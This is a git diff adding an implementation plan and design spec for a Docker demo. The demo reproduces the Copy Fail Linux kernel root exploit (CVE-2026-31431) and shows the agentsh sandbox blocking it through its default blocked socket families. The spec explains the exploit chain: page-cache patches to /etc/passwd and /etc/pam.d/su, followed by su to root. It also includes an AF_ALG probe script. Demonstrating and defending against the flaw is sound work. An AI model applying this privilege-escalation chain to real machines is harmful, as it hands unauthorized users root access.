+DOCKERFILE   := examples/demo-cve-2026-31431/Dockerfile
+CTX          := ../..
+RECORD_FLAGS := --idle-time-limit=1 --cols=100 --rows=30
+
+AGENTSH_DOCKER_FLAGS := \
+  --cap-add=SYS_ADMIN \
+  --cap-add=SYS_PTRACE \
+  --device=/dev/fuse \
+  --security-opt=apparmor=unconfined
+
+.PHONY: build demo-vuln demo-agentsh record verify clean help
+
+help:
+	@echo "Targets: build demo-vuln demo-agentsh record verify clean"
+
+build:
+	cd $(CTX) && [ -x bin/agentsh ] || make build
+	cd $(CTX) && docker build -f $(DOCKERFILE) -t $(IMAGE) .
+
+demo-vuln: build
+	docker run --rm -it --security-opt seccomp=unconfined $(IMAGE) vuln
+
+demo-agentsh: build
+	docker run --rm -it $(AGENTSH_DOCKER_FLAGS) $(IMAGE) agentsh
+
+verify: build
+	docker run --rm --security-opt seccomp=unconfined $(IMAGE) verify vuln
+	docker run --rm $(AGENTSH_DOCKER_FLAGS) $(IMAGE) verify agentsh
+
+record: build
+	@command -v asciinema >/dev/null || (echo "Install asciinema first"; exit 1)
+	asciinema rec $(RECORD_FLAGS) \
+	  -c 'docker run --rm -it --security-opt seccomp=unconfined $(IMAGE) vuln' \
+	  recordings/vuln.cast --overwrite
+	asciinema rec $(RECORD_FLAGS) \
+	  -c 'docker run --rm -it $(AGENTSH_DOCKER_FLAGS) $(IMAGE) agentsh' \
+	  recordings/agentsh.cast --overwrite
+
+clean:
+	docker image rm $(IMAGE) 2>/dev/null || true
+```
+
+- [ ] **Step 2: Commit**
+
+```bash
+git add examples/demo-cve-2026-31431/Makefile
+git commit -m "demo(cve-2026-31431): Makefile"
+```
+
+---
+
+## Task 10: README
+
+**Files:**
+- Create: `examples/demo-cve-2026-31431/README.md`
+
+- [ ] **Step 1: Write README.md**
+
+```markdown
+# CVE-2026-31431 (Copy Fail) Demo
+
+A self-contained Docker demo that:
+
+1. Reproduces **CVE-2026-31431** — a logic flaw in `algif_aead`/`authencesn`
+   that gives any unprivileged user a deterministic, race-free 4-byte
+   page-cache write primitive. Chained through `/etc/passwd` and
+   `/etc/pam.d/su`, it produces a no-password root shell.
+2. Shows agentsh's **default configuration** blocking the exploit
+   before the first byte is written — zero custom rules required.
+
+Watch the recordings:
+
+```sh
+asciinema play recordings/vuln.cast
+asciinema play recordings/agentsh.cast
+# or open recordings/demo.html in a browser
+```
+
+## Run it yourself
+
+```sh
+make build
+make demo-vuln     # page-cache write lands, root marker written
+make demo-agentsh  # AF_ALG blocked at socket(), /etc/passwd untouched
+make verify        # non-interactive assertions
+```
+
+## The protection: zero config
+
+agentsh's `DefaultBlockedFamilies()` includes `AF_ALG` (family 38). No
+`socket_rules`, no `blocked_socket_families` entry is needed in config:
+
+```yaml
+sandbox:
+  seccomp:
+    enabled: true
+    # AF_ALG blocked by default. Nothing else to configure.
+```
+
+The Copy Fail exploit must call `socket(AF_ALG, SOCK_SEQPACKET, 0)` as its
+very first step. agentsh returns `EAFNOSUPPORT` before `write4()` is ever
+invoked, leaving `/etc/passwd` and `/etc/pam.d/su` untouched.
+
+**agentsh blocked Copy Fail before the CVE was publicly disclosed.**
+
+## How the exploit works
+
+1. Opens `/etc/passwd` and `/etc/pam.d/su` read-only.
+2. For each 4-byte patch: creates an `AF_ALG` (authencesn) socket, splices
+   the file page into the AEAD scatterlist as a writable destination,
+   which corrupts the page cache in place.
+3. Patches `/etc/passwd`: alice's UID field `1000` → `0000`.
+4. Patches `/etc/pam.d/su`: `pam_rootok.so` → `pam_permit.so`.
+5. Runs `su alice` — PAM immediately grants auth, alice appears as uid=0.
+
+Nothing is written to disk. Rebooting or dropping page cache reverts the patches.
+
+## CVE references
+
+- **CVE-2026-31431** — copy.fail / algif_aead/authencesn page-cache LPE
+- Affected: Linux kernels ~4.14 through pre-patch (mainline commit a664bf3d603d)
+- Advisory: https://copy.fail/ · https://xint.io/blog/copy-fail-linux-distributions
+- PoC basis: https://github.com/mfloresdacunha/CVE-2026-31431
+```
+
+- [ ] **Step 2: Commit**
+
+```bash
+git add examples/demo-cve-2026-31431/README.md
+git commit -m "demo(cve-2026-31431): README"
+```
+
+---
+
+## Task 11: Smoke test — vuln mode
+
+- [ ] **Step 1: Build image**
+
+```bash
+docker build -f examples/demo-cve-2026-31431/Dockerfile -t agentsh-copyfail-demo . 2>&1 | tail -5
+```
+
+Expected: build succeeds.
+
+- [ ] **Step 2: Run vuln mode**
+
+```bash
+docker run --rm --security-opt seccomp=unconfined agentsh-copyfail-demo vuln 2>&1
+```
+
+Expected outcomes:
+- **Host kernel unpatched:** exploit lands, `/tmp/OWNED-BY-ALICE` contains `uid=0(root)`, verdict `EXPLOIT SUCCEEDED`
+- **Host kernel patched:** exploit.py returns exit 2, verdict `KERNEL PATCHED`, note that AF_ALG still opened
+
+If AF_ALG socket returns an error even in vuln mode (not EAFNOSUPPORT but some other error): the host Docker daemon may have its own seccomp profile blocking AF_ALG. Run with `--privileged` as a test; if that works, document it.
+
+- [ ] **Step 3: No commit — verification only**
+
+---
+
+## Task 12: Smoke test — agentsh mode
+
+- [ ] **Step 1: Run agentsh mode**
+
+```bash
+docker run --rm \
+  --cap-add=SYS_ADMIN --cap-add=SYS_PTRACE \
+  --device=/dev/fuse \
+  --security-opt=apparmor=unconfined \
+  agentsh-copyfail-demo agentsh 2>&1
+```
+
+Expected:
+- Step 1: `detect.py` prints `BLOCKED (EAFNOSUPPORT)`
+- Step 2: `exploit.py` tracebacks at the `socket.socket(AF_ALG, ...)` call with `[Errno 97] Address family not supported by protocol`
+- `/etc/passwd` still shows alice at uid=1000
+- Marker file absent
+- Verdict: `BLOCKED`
+
+If server fails to start: check `/tmp/agentsh-server.log` via:
+
+```bash
+docker run --rm --cap-add=SYS_ADMIN --cap-add=SYS_PTRACE \
+  --device=/dev/fuse --security-opt=apparmor=unconfined \
+  --entrypoint /bin/bash agentsh-copyfail-demo \
+  -c "agentsh server --config /etc/agentsh/config.yml & sleep 3; cat /tmp/agentsh-server.log"
+```
+
+- [ ] **Step 2: No commit — verification only**
+
+---
+
+## Task 13: Recordings + demo.html (user-driven)
+
+- [ ] **Step 1: Record both modes**
+
+```bash
+cd examples/demo-cve-2026-31431
+make record
+```
+
+Writes `recordings/vuln.cast` and `recordings/agentsh.cast`.
+
+- [ ] **Step 2: Generate demo.html**
+
+From the repo root, run this Python script to embed the casts with proper ESC escaping:
+
+```python
+# Run from repo root:
+# python3 examples/demo-cve-2026-31431/scripts/gen_demo_html.py
+```
+
+Create `examples/demo-cve-2026-31431/scripts/gen_demo_html.py`:
+
+```python
+#!/usr/bin/env python3
+"""Generate a self-contained demo.html embedding both cast files."""
+import pathlib
+
+ROOT  = pathlib.Path("examples/demo-cve-2026-31431")
+RECS  = ROOT / "recordings"
+OUT   = RECS / "demo.html"
+
+def escape_cast(path):
+    return path.read_bytes().replace(b"\x1b", b"\\u001b").decode()
+
+vuln_cast    = escape_cast(RECS / "vuln.cast")
+agentsh_cast = escape_cast(RECS / "agentsh.cast")
+
+html = f"""<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<title>CVE-2026-31431 (Copy Fail) &mdash; Before &amp; After agentsh</title>
+<meta name="description" content="Copy Fail LPE via page-cache write — blocked by agentsh default configuration.">
+<link rel="icon" type="image/svg+xml" href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'%3E%3Crect width='32' height='32' rx='6' fill='%230E4A33'/%3E%3Cpolyline points='8 20 14 14 8 8' fill='none' stroke='%23ffffff' stroke-width='2.5' stroke-linecap='round' stroke-linejoin='round'/%3E%3Cline x1='16' y1='22' x2='24' y2='22' stroke='%23ffffff' stroke-width='2.5' stroke-linecap='round'/%3E%3C/svg%3E">
+<link rel="preconnect" href="https://fonts.googleapis.com">
+<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+<link href="https://fonts.googleapis.com/css2?family=DM+Serif+Display&family=Inter:wght@400;500;600&family=JetBrains+Mono:wght@400;500&display=swap" rel="stylesheet">
+<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/asciinema-player@3.15.1/dist/bundle/asciinema-player.css">
+<style>
+  *,*::before,*::after{{box-sizing:border-box;margin:0;padding:0}}
+  :root{{--bg:#F4F8F6;--bg2:#fff;--border:#e2e8e5;--border2:#d0d8d5;--txt:#06100C;--txt2:#0A2A1F;--muted:#4A362A;--faint:#8a8a8a;--green:#0E4A33;--green2:#4FA36A;--red:#C86A3E;--r:18px;--rs:12px}}
+  html{{scroll-behavior:smooth}}
+  body{{font-family:ui-sans-serif,system-ui,-apple-system,Segoe UI,Roboto,sans-serif;background:var(--bg);color:var(--muted);line-height:1.6;overflow-x:hidden}}
+  a{{color:inherit;text-decoration:none}}
+  code{{font-family:'JetBrains Mono',monospace;font-size:.9em}}
+  .bg-grad{{position:fixed;inset:0;pointer-events:none;background:radial-gradient(ellipse at 50% 0%,rgba(197,214,174,.4) 0%,transparent 60%);z-index:-1}}
+  nav{{position:sticky;top:0;z-index:50;background:rgba(244,248,246,.92);backdrop-filter:blur(12px);border-bottom:1px solid var(--border)}}
+  .nav-inner{{max-width:1024px;margin:0 auto;padding:14px 24px;display:flex;align-items:center;justify-content:space-between}}
+  .nav-left{{display:flex;align-items:center;gap:24px}}
+  .nav-logo{{display:flex;align-items:center;gap:10px;transition:opacity .3s}}
+  .nav-logo:hover{{opacity:.85}}
+  .nav-logo-icon{{width:28px;height:28px;border-radius:var(--rs);background:var(--green);display:flex;align-items:center;justify-content:center}}
+  .nav-logo-icon svg{{color:#fff}}
+  .nav-logo-text{{font-weight:500;color:var(--txt);letter-spacing:-.01em}}
+  .nav-sep{{width:1px;height:20px;background:var(--border2)}}
+  .nav-cr-text{{font-size:13px;font-weight:500;color:var(--muted);transition:color .2s}}
+  .nav-cr-link:hover .nav-cr-text{{color:var(--green)}}
+  .nav-links{{display:flex;align-items:center;gap:20px;font-size:13px}}
+  .nav-links a{{color:var(--muted);transition:color .2s}}
+  .nav-links a:hover{{color:var(--green)}}
+  .badge-cve{{display:inline-flex;align-items:center;gap:5px;padding:3px 10px;border-radius:999px;background:rgba(200,106,62,.1);border:1px solid rgba(200,106,62,.25);color:var(--red);font-family:'JetBrains Mono',monospace;font-size:11px;font-weight:600;letter-spacing:.02em}}
+  .hero{{max-width:1024px;margin:0 auto;padding:80px 24px 40px;text-align:center}}
+  .hero-title{{font-family:'DM Serif Display',serif;font-size:clamp(28px,5vw,44px);font-weight:400;color:var(--txt);letter-spacing:-.01em;line-height:1.15;margin-bottom:16px}}
+  .hero-title .accent{{color:var(--green)}}
+  .hero-subtitle{{font-size:clamp(14px,2vw,17px);color:var(--txt2);line-height:1.6;max-width:600px;margin:0 auto 12px}}
+  .hero-links{{display:flex;justify-content:center;gap:16px;flex-wrap:wrap;margin-top:16px}}
+  .hero-links a{{font-size:13px;color:var(--green);border-bottom:1px solid rgba(14,74,51,.25);padding-bottom:1px;transition:border-color .2s}}
+  .hero-links a:hover{{border-color:var(--green)}}
+  .zero-config{{max-width:1024px;margin:0 auto;padding:0 24px 48px}}
+  .zc-header{{display:flex;align-items:center;gap:12px;margin-bottom:20px}}
+  .badge{{font-size:11px;font-weight:700;letter-spacing:.08em;text-transform:uppercase;padding:4px 12px;border-radius:6px}}
+  .badge-fix{{background:rgba(79,163,106,.12);color:var(--green2);border:1px solid rgba(79,163,106,.25)}}
+  .zc-title{{font-family:'DM Serif Display',serif;font-size:clamp(18px,2.5vw,24px);font-weight:400;color:var(--txt);letter-spacing:-.01em}}
+  .zc-card{{background:#1a1b26;border-radius:var(--r);border:1px solid var(--border2);overflow:hidden;box-shadow:0 4px 24px rgba(7,17,13,.1)}}
+  .zc-card-header{{display:flex;align-items:center;gap:10px;padding:14px 20px;border-bottom:1px solid rgba(255,255,255,.07);background:rgba(255,255,255,.03)}}
+  .zc-card-title{{font-family:'JetBrains Mono',monospace;font-size:12px;color:#7dcfff;font-weight:500}}
+  .zc-card-body{{padding:20px 24px;font-family:'JetBrains Mono',monospace;font-size:12.5px;line-height:1.75;color:#a9b1d6;white-space:pre;overflow-x:auto}}
+  .zc-fact{{margin-top:16px;padding:14px 18px;background:rgba(14,74,51,.06);border:1px solid rgba(14,74,51,.15);border-radius:var(--rs);font-size:13px;color:var(--txt2);line-height:1.65}}
+  .zc-fact code{{background:rgba(14,74,51,.1);padding:1px 5px;border-radius:4px;font-size:.85em}}
+  .section{{max-width:1024px;margin:0 auto;padding:48px 24px 64px}}
+  .section-label{{display:flex;align-items:center;gap:10px;margin-bottom:12px}}
+  .badge-vuln{{background:rgba(200,106,62,.12);color:var(--red);border:1px solid rgba(200,106,62,.25)}}
+  .section-title{{font-family:'DM Serif Display',serif;font-size:clamp(20px,3vw,28px);font-weight:400;color:var(--txt);letter-spacing:-.01em}}
+  .section-desc{{font-size:14px;color:var(--muted);max-width:640px;margin:8px 0 20px;line-height:1.65}}
+  .section-desc code{{background:rgba(14,74,51,.08);padding:1px 5px;border-radius:4px;font-size:.85em}}
+  .player-wrap{{border-radius:var(--r);overflow:hidden;border:1px solid var(--border2);background:#1a1b26;box-shadow:0 20px 60px rgba(7,17,13,.18);transition:border-color .3s}}
+  .player-wrap:hover{{border-color:var(--green)}}
+  .player-wrap.fix:hover{{border-color:var(--green2)}}
+  .verdict{{text-align:center;padding:14px 20px;font-family:'JetBrains Mono',monospace;font-size:13px;font-weight:700;letter-spacing:.06em;text-transform:uppercase}}
+  .verdict-vuln{{color:#f7768e;border-top:1px solid rgba(247,118,142,.2);background:rgba(247,118,142,.04)}}
+  .verdict-fix{{color:#9ece6a;border-top:1px solid rgba(158,206,106,.2);background:rgba(158,206,106,.04)}}
+  footer{{border-top:1px solid var(--border);padding:32px 24px;text-align:center}}
+  .footer-inner{{max-width:1024px;margin:0 auto;display:flex;flex-direction:column;align-items:center;gap:16px}}
+  .footer-links{{display:flex;gap:20px;flex-wrap:wrap;justify-content:center;font-size:13px}}
+  .footer-links a{{color:var(--muted);transition:color .2s}}
+  .footer-links a:hover{{color:var(--green)}}
+  .footer-copy{{font-size:12px;color:var(--faint)}}
+  .yaml-key{{color:#7aa2f7}}.yaml-val{{color:#9ece6a}}.yaml-str{{color:#e0af68}}
+  .yaml-bool{{color:#bb9af7}}.yaml-cmt{{color:#565f89;font-style:italic}}
+  @media(max-width:640px){{.hero{{padding:60px 16px 24px}}.section{{padding:32px 16px 48px}}.zero-config{{padding:0 16px 32px}}.nav-links{{display:none}}}}
+</style>
+</head>
+<body>
+<div class="bg-grad"></div>
+<nav>
+  <div class="nav-inner">
+    <div class="nav-left">
+      <a href="https://www.agentsh.org/" class="nav-logo">
+        <div class="nav-logo-icon"><svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><polyline points="4 17 10 11 4 5"></polyline><line x1="12" y1="19" x2="20" y2="19"></line></svg></div>
+        <span class="nav-logo-text">agentsh</span>
+      </a>
+      <div class="nav-sep"></div>
+      <a href="https://www.canyonroad.ai/" class="nav-cr-link" style="display:flex;align-items:center;gap:8px;"><span class="nav-cr-text">Canyon Road</span></a>
+    </div>
+    <div class="nav-links">
+      <a href="https://copy.fail/" target="_blank" rel="noopener">copy.fail Advisory</a>
+      <a href="https://github.com/canyonroad/agentsh" target="_blank" rel="noopener">GitHub</a>
+      <a href="https://www.agentsh.org/" target="_blank" rel="noopener">agentsh.org</a>
+    </div>
+  </div>
+</nav>
+<section class="hero">
+  <div style="display:flex;justify-content:center;gap:8px;margin-bottom:20px;"><span class="badge-cve">CVE-2026-31431</span></div>
+  <h1 class="hero-title">Copy Fail &mdash; <span class="accent">Before &amp; After</span></h1>
+  <p class="hero-subtitle">
+    A logic flaw in <code>algif_aead</code>/<code>authencesn</code> lets any unprivileged
+    user deterministically write 4 bytes into any file&rsquo;s page cache. Chained through
+    <code>/etc/passwd</code> and <code>/etc/pam.d/su</code>, it produces a no-password
+    root shell &mdash; 732 bytes of Python, no races, no offsets.
+  </p>
+  <div class="hero-links">
+    <a href="https://copy.fail/" target="_blank" rel="noopener">copy.fail advisory &rarr;</a>
+    <a href="https://xint.io/blog/copy-fail-linux-distributions" target="_blank" rel="noopener">Technical write-up &rarr;</a>
+    <a href="https://www.agentsh.org/" target="_blank" rel="noopener">Install agentsh &rarr;</a>
+  </div>
+</section>
+<div class="zero-config">
+  <div class="zc-header">
+    <span class="badge badge-fix">Zero configuration</span>
+    <h2 class="zc-title">agentsh blocked this before the CVE was disclosed.</h2>
+  </div>
+  <div class="zc-card">
+    <div class="zc-card-header">
+      <svg width="14" height="14" viewBox="0 0 24 24" fill="none" stroke="#7dcfff" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M14 2H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h12a2 2 0 0 0 2-2V8z"></path><polyline points="14 2 14 8 20 8"></polyline></svg>
+      <span class="zc-card-title">config.yml &mdash; the complete agentsh configuration for this demo</span>
+    </div>
+    <div class="zc-card-body"><span class="yaml-cmt"># AF_ALG (family 38) is in DefaultBlockedFamilies() — no custom rule needed.
+# agentsh blocked Copy Fail before the CVE was disclosed.</span>
+
+<span class="yaml-key">sandbox</span>:
+  <span class="yaml-key">seccomp</span>:
+    <span class="yaml-key">enabled</span>: <span class="yaml-bool">true</span>
+    <span class="yaml-cmt"># blocked_socket_families is NOT set.</span>
+    <span class="yaml-cmt"># DefaultBlockedFamilies() includes AF_ALG automatically.</span>
+    <span class="yaml-cmt"># Nothing else to configure.</span></div>
+  </div>
+  <div class="zc-fact">
+    <code>AF_ALG</code> (socket family&nbsp;38) has been in agentsh&rsquo;s <code>DefaultBlockedFamilies()</code>
+    since the feature shipped &mdash; alongside <code>AF_VSOCK</code>, <code>AF_RDS</code>,
+    <code>AF_TIPC</code>, and other rarely-needed kernel facilities. The Copy Fail exploit
+    must call <code>socket(AF_ALG, SOCK_SEQPACKET, 0)</code> as its very first operation.
+    agentsh returns <code>EAFNOSUPPORT</code> before <code>write4()</code> ever fires.
+    <code>/etc/passwd</code> and <code>/etc/pam.d/su</code> are never touched.
+  </div>
+</div>
+<section class="section">
+  <div class="section-label"><span class="badge badge-vuln">Before</span><h2 class="section-title">Bare exploit &mdash; no agentsh</h2></div>
+  <p class="section-desc">
+    Alice (uid=1000) patches <code>/etc/passwd</code> (uid&nbsp;&rarr;&nbsp;0000) and
+    <code>/etc/pam.d/su</code> (<code>pam_rootok.so</code>&nbsp;&rarr;&nbsp;<code>pam_permit.so</code>)
+    in page cache. Nothing is written to disk. <code>su alice</code> drops into a root shell
+    with no password. <code>/tmp/OWNED-BY-ALICE</code> is written as uid=0.
+  </p>
+  <div class="player-wrap"><div id="player-vuln"></div><div class="verdict verdict-vuln">VERDICT: EXPLOIT SUCCEEDED</div></div>
+</section>
+<section class="section">
+  <div class="section-label"><span class="badge badge-fix">After</span><h2 class="section-title">Same exploit under agentsh</h2></div>
+  <p class="section-desc">
+    agentsh&rsquo;s default <code>blocked_socket_families</code> returns
+    <code>EAFNOSUPPORT</code> at <code>socket(AF_ALG,&nbsp;...)</code>.
+    The exploit tracebacks immediately. <code>/etc/passwd</code> still shows uid=1000.
+    No marker file. No write. Zero custom configuration required.
+  </p>
+  <div class="player-wrap fix"><div id="player-agentsh"></div><div class="verdict verdict-fix">VERDICT: BLOCKED &mdash; zero config</div></div>
+</section>
+<footer>
+  <div class="footer-inner">
+    <div class="footer-links">
+      <a href="https://copy.fail/" target="_blank" rel="noopener">copy.fail Advisory</a>
+      <a href="https://xint.io/blog/copy-fail-linux-distributions" target="_blank" rel="noopener">Technical write-up</a>
+      <a href="https://www.agentsh.org/" target="_blank" rel="noopener">agentsh.org</a>
+      <a href="https://www.canyonroad.ai/" target="_blank" rel="noopener">Canyon Road</a>
+      <a href="https://github.com/canyonroad/agentsh" target="_blank" rel="noopener">GitHub</a>
+    </div>
+    <p class="footer-copy">&copy; 2026 Canyon Road Technologies Inc. &middot; agentsh is Apache 2.0</p>
+  </div>
+</footer>
+<script type="text/plain" id="vuln-cast">{vuln_cast}</script>
+<script type="text/plain" id="agentsh-cast">{agentsh_cast}</script>
+<script src="https://cdn.jsdelivr.net/npm/asciinema-player@3.15.1/dist/bundle/asciinema-player.min.js"></script>
+<script>
+(function(){{
+  function loadCast(id){{return document.getElementById(id).textContent;}}
+  function urlFromCast(text){{return URL.createObjectURL(new Blob([text],{{type:"application/x-asciicast"}}));}}
+  var opts={{fit:"width",autoPlay:false,terminalFontSize:"13px",terminalLineHeight:1.4}};
+  AsciinemaPlayer.create(urlFromCast(loadCast("vuln-cast")),document.getElementById("player-vuln"),opts);
+  AsciinemaPlayer.create(urlFromCast(loadCast("agentsh-cast")),document.getElementById("player-agentsh"),opts);
+}})();
+</script>
+</body>
+</html>"""
+OUT.write_text(html)
+print(f"Written: {OUT}  ({len(html):,} bytes)")
+```
+
+- [ ] **Step 3: Run the generator**
+
+```bash
+python3 examples/demo-cve-2026-31431/scripts/gen_demo_html.py
+```
+
+Expected: `Written: examples/demo-cve-2026-31431/recordings/demo.html  (N bytes)`
+
+- [ ] **Step 4: Write recordings/README.md**
+
+```markdown
+# Recordings
+
+| File | Mode | What you'll see |
+|---|---|---|
+| `vuln.cast` | no agentsh, Docker seccomp off | /etc/passwd uid=0000, marker written as root |
+| `agentsh.cast` | agentsh default config | EAFNOSUPPORT at socket() — zero config blocks it |
+
+## Playback
+
+```sh
+asciinema play vuln.cast
+asciinema play agentsh.cast
+# or open demo.html in a browser (self-contained, no server needed)
+```
+
+## Re-record
+
+```sh
+cd examples/demo-cve-2026-31431
+make record
+python3 scripts/gen_demo_html.py
+```
+```
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add examples/demo-cve-2026-31431/recordings/ \
+        examples/demo-cve-2026-31431/scripts/gen_demo_html.py
+git commit -m "demo(cve-2026-31431): recordings README + demo.html generator"
+```
+
+---
+
+## Self-review
+
+**Spec coverage:**
+- Goal (reproduce + block): Tasks 2, 6, 7, 11, 12 ✓
+- Zero-config narrative: Task 4 (config.yml), Task 7 (narration), Task 10 (README), Task 13 (demo.html) ✓
+- Vuln mode steps 0-5: Task 6 ✓
+- Protected mode steps 0-4: Task 7 ✓
+- Kernel-patched handling: Task 6 (exit code 2), Task 8 (verify.sh) ✓
+- detect.py + exploit.py: Task 2 ✓
+- Makefile: Task 9 ✓
+- demo.html with zero-config callout at top: Task 13 ✓
+
+**No placeholders:** all steps contain exact code and commands.
+
+**Type consistency:** `MARKER=/tmp/OWNED-BY-ALICE` throughout Tasks 6, 7, 8. `agentsh-copyfail-demo` image name throughout Tasks 3, 9, 11, 12. Exit codes (0=success, 1=error, 2=patched) defined in Task 2, used in Tasks 6, 8.

--- a/docs/superpowers/specs/2026-05-11-cve-2026-31431-copyfail-demo-design.md
+++ b/docs/superpowers/specs/2026-05-11-cve-2026-31431-copyfail-demo-design.md
@@ -1,0 +1,247 @@
+# CVE-2026-31431 (Copy Fail) Demo — Design Spec
+
+**Date:** 2026-05-11
+**Author:** Eran Sandler
+**Status:** Design — pending implementation plan
+**CVE:** CVE-2026-31431 ("Copy Fail")
+**Advisory:** https://copy.fail/ · https://xint.io/blog/copy-fail-linux-distributions
+
+## Goal
+
+A self-contained Docker-based demo that:
+
+1. Reproduces **CVE-2026-31431** — the Copy Fail logic flaw in `algif_aead`/`authencesn` that lets any unprivileged user perform a deterministic 4-byte page-cache write to any readable file, chained to patch `/etc/passwd` and `/etc/pam.d/su` and obtain a root shell.
+2. Shows the same exploit blocked by **agentsh's default configuration** — no custom rules required. `AF_ALG` (family 38) has been in `DefaultBlockedFamilies()` since the feature shipped, predating the CVE disclosure.
+
+Primary artifacts: two asciinema recordings + a self-contained `demo.html`.
+
+## Non-goals
+
+- macOS / Windows variants. Linux only.
+- Full interactive root shell in the demo (replaced with a marker-file write so the container doesn't hang on TTY).
+- Kernel module unloading (`modprobe -r algif_aead`). The demo shows the agentsh socket-block mitigation only.
+
+## Key narrative: zero configuration
+
+Unlike CVE-2025-32463 (file + command rules) and CVE-2026-43284 (explicit `socket_rules`), this demo uses **agentsh's unmodified defaults**. No `socket_rules`, no `blocked_socket_families` entry is written. The config file just enables seccomp:
+
+```yaml
+sandbox:
+  seccomp:
+    enabled: true
+    file_monitor:
+      enabled: false   # prevent auto-enable deadlock (issue #304)
+```
+
+`AF_ALG` is blocked automatically because `DefaultBlockedFamilies()` in `internal/seccomp/families.go:69` includes it. The protected-mode narration makes this explicit: *"agentsh blocked Copy Fail before the CVE was disclosed."*
+
+## Target directory
+
+```
+examples/demo-cve-2026-31431/
+  Dockerfile
+  Makefile
+  config.yml
+  agent-default.yml
+  .gitignore
+  exploit/
+    exploit.py           # full LPE PoC (modified for demo — writes marker file)
+    detect.py            # socket-only check used in step 0
+  scripts/
+    dispatch.sh
+    demo-vuln.sh
+    demo-agentsh.sh
+    verify.sh
+    lib/
+      io.sh
+      config-walkthrough.txt
+  recordings/
+    vuln.cast
+    agentsh.cast
+    demo.html
+    README.md
+  README.md
+```
+
+## Image
+
+Single-stage Dockerfile, based on `debian:trixie-slim`.
+
+- `python3`, `login`, `libpam-runtime` installed (needed for the exploit chain and for `/usr/bin/su` + `/etc/pam.d/su` to exist).
+- `su` must be setuid root and present at `/usr/bin/su`.
+- `/etc/pam.d/su` must contain the `pam_rootok.so` reference the exploit patches.
+- agentsh + agentsh-unixwrap copied in from `bin/`.
+- Non-root user `alice` (uid 1000) with `/home/alice/work` as workdir.
+- Build context is the repo root so `bin/agentsh` and `bin/agentsh-unixwrap` are reachable.
+
+**Docker runtime flags:**
+
+| Mode | Extra flags |
+|------|-------------|
+| `vuln` | `--security-opt seccomp=unconfined` |
+| `agentsh` | `--cap-add=SYS_ADMIN --cap-add=SYS_PTRACE --device=/dev/fuse --security-opt=apparmor=unconfined` |
+
+## Exploit
+
+### `exploit/detect.py`
+
+Used in step 0 of both modes. Just tries to open the AF_ALG socket and reports OPEN or BLOCKED:
+
+```python
+#!/usr/bin/env python3
+# detect.py — check whether the AF_ALG attack surface is accessible.
+import socket, errno, sys
+
+AF_ALG = 38
+
+try:
+    fd = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
+    fd.close()
+    print("socket(AF_ALG, SOCK_SEQPACKET, 0)   OPEN   — Copy Fail attack surface accessible")
+    sys.exit(0)
+except OSError as e:
+    if e.errno == errno.EAFNOSUPPORT:
+        print("socket(AF_ALG, SOCK_SEQPACKET, 0)   BLOCKED (EAFNOSUPPORT)")
+    else:
+        print(f"socket(AF_ALG, SOCK_SEQPACKET, 0)   ERROR  ({e})")
+    sys.exit(1)
+```
+
+### `exploit/exploit.py`
+
+Based on `mfloresdacunha/CVE-2026-31431/exploit.py` (MIT licence, public PoC). Two modifications for the demo:
+
+1. **Marker file instead of interactive shell:** the final `os.execvp("su", ["su", user])` is replaced with:
+   ```python
+   os.system(f"su {user} -c 'id > /tmp/OWNED-BY-ALICE'")
+   ```
+   This writes the marker as root (uid=0) without needing a TTY.
+
+2. **Kernel-patched detection:** if the `/etc/passwd` page-cache write doesn't land (`patch did not land` RuntimeError), the script exits with code 2 and a clear message: *"Kernel appears to be patched (commit a664bf3d603d). AF_ALG socket still opened — agentsh blocks it regardless."*
+
+The exploit's two-patch chain:
+- `/etc/passwd` — alice's UID field (`1000`) → `0000` in page cache
+- `/etc/pam.d/su` — `pam_rootok.so` → `pam_permit.so` in page cache
+- `su alice -c 'id > /tmp/OWNED-BY-ALICE'` — PAM skips password (permit), passwd shows uid=0, command runs as root
+
+Nothing is written to disk. Drop page cache or reboot to revert.
+
+## Mode A — `demo-vuln.sh`
+
+```
+[0/5] AF_ALG attack surface check (pre-exploit baseline)
+      detect.py → OPEN
+
+[1/5] Identity check
+      whoami → alice  (uid=1000)
+      id     → uid=1000(alice)
+
+[2/5] /etc/passwd — pre-exploit state
+      grep alice /etc/passwd → alice:x:1000:1000:...
+      note: "Watch this field change in page cache without touching disk."
+
+[3/5] Run Copy Fail exploit
+      python3 /opt/exploit/exploit.py
+        [*] Patching /etc/passwd page cache: uid 1000 → 0000
+        [*] Patching /etc/pam.d/su page cache: pam_rootok.so → pam_permit.so
+        [+] Drops into su alice ...
+
+[4/5] /etc/passwd — post-exploit state (page cache only)
+      grep alice /etc/passwd → alice:x:0000:1000:...  ← uid=0 in memory
+      diff <(cat /etc/passwd) <(cat /proc/$(pgrep systemd | head -1)/root/etc/passwd)
+      note: "On-disk file is unchanged. Page cache was corrupted."
+
+[5/5] Marker file written as root
+      cat /tmp/OWNED-BY-ALICE → uid=0(root)
+      ls -la /tmp/OWNED-BY-ALICE → owned by root
+
+VERDICT: EXPLOIT SUCCEEDED — alice obtained root via 4-byte page-cache write.
+
+[If kernel patched]
+VERDICT: KERNEL PATCHED — exploit write did not land, but AF_ALG socket
+         opened. agentsh would have blocked it at step 0 regardless.
+```
+
+## Mode B — `demo-agentsh.sh`
+
+```
+[0/4] Show the agentsh config — no custom rules
+      show_yaml /etc/agentsh/config.yml
+      <config-walkthrough.txt narration>
+
+[1/4] AF_ALG attack surface check under agentsh
+      agentsh wrap -- python3 /opt/exploit/detect.py
+      → BLOCKED (EAFNOSUPPORT)
+      note: "AF_ALG is in DefaultBlockedFamilies() — blocked with zero config."
+
+[2/4] Attempt the full exploit under agentsh
+      agentsh wrap -- python3 /opt/exploit/exploit.py
+      → Traceback: [Errno 97] Address family not supported by protocol
+      → Fails at socket(AF_ALG, ...) before any file is touched
+
+[3/4] Verify /etc/passwd and marker file untouched
+      grep alice /etc/passwd → uid=1000 (unchanged)
